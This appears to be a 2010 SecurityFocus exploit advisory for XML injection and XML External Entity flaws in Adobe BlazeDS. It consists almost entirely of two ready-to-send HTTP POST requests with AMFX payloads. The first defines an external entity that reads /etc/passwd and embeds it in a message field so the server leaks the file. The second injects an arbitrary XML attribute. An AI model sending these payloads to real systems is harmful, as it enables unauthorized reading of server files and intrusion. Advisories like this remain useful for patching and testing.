Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities

The following example AMFX requests are available:

1. XML External Entity injection:

POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>

2. XML injection

POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>
</body></amfx>


 

Privacy Statement
Copyright 2010, SecurityFocus